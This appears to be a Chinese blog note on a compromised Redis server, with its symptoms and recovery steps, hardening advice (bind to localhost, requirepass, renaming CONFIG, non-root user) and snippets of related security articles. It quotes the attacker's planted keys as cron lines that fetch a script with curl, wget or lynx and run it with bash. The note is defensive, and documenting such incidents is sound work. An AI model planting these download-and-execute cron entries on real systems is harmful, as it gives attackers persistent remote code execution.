redis伺服器遭攻擊,症狀:
1. redis中的快取資料每10分鐘全部被清;
2. 許多目錄下多了root檔案和一堆隱藏檔案;
3. redis多了三個key:backup1、backup2、backup3;
key值對應的內容如下:
backup1: */2 * * * * curl -s > .cmd && bash .cmd
backup2: */5 * * * * wget -o .cmd && bash .cmd
backup3: */10 * * * * lynx -source > .cmd && bash .cmd
應對措施:
1. 在非root使用者下重新安裝redis,對特定ip開放埠,如果只是本機使用,繫結127.0.0.1:6379 ,增加密碼;
2. 清除定時任務;
3. 殺掉程序、刪除木馬檔案;
預防措施:
1. 禁止
redis
服務對公網開放,可通過修改
redis.conf
配置檔案中的
"#bind 127.0.0.1"
,去掉前面的
"#"即可(
redis
本來就是作為記憶體資料庫,只要監聽在本機即可);
2. 設定密碼訪問認證,可通過修改
redis.conf
配置檔案中的
"requirepass"
設定複雜密碼
(需要重啟
redis
服務才能生效);
3. 對訪問源
ip進行訪問控制,可在防火牆限定指定源
ip才可以連線
redis
伺服器;
4. 修改
redis
預設埠,將預設的
6379
埠修改為其他埠;
5. 禁用
config
指令避免惡意操作,在
redis
配置檔案
redis.conf
中配置rename-command
項"rename_config"
,這樣即使存在未授權訪問,也能夠給攻擊者使用
config
指令加大難度;
6. redis
使用普通使用者許可權,禁止使用
root
許可權啟動
redis
服務,這樣可以保證在存在漏洞的情況下攻擊者也只能獲取到普通使用者許可權,無法獲取
root
許可權;參考文件:
1.
Nginx 防host攻擊漏洞
url存在http host頭攻擊漏洞。http協議中,host值經常被使用於jsp 中獲取上下文,如果不做驗證,很容易被引用其他途徑的資源。通過 h 引數,修改http頭內容。正常情況下,host 是請求位址去掉埠號,如下。所以,防止此漏洞的思路。方式一 在nginx 如果有的話。沒有ng就去to...
Redis漏洞攻擊植入木馬逆向分析
阿里雲安全 2015 11 17 14 24 2015年11月10日,阿里雲安全團隊捕獲到黑客大規模利用redis漏洞的行為,獲取機器root許可權,並植入木馬進行控制,異地登入來自ip 104.219.異地登入會有報警 由於該漏洞危害嚴重,因此阿里雲安全團隊在2015年11月11日,簡訊 聯絡使用...
防重放攻擊
以前總是通過timestamp來防止重放攻擊,但是這樣並不能保證每次請求都是一次性的。今天看到了一篇文章介紹的通過nonce number used once 來保證一次有效,感覺兩者結合一下,就能達到乙個非常好的效果了。重放攻擊是計算機世界黑客常用的攻擊方式之一,所謂重放攻擊就是攻擊者傳送乙個目的...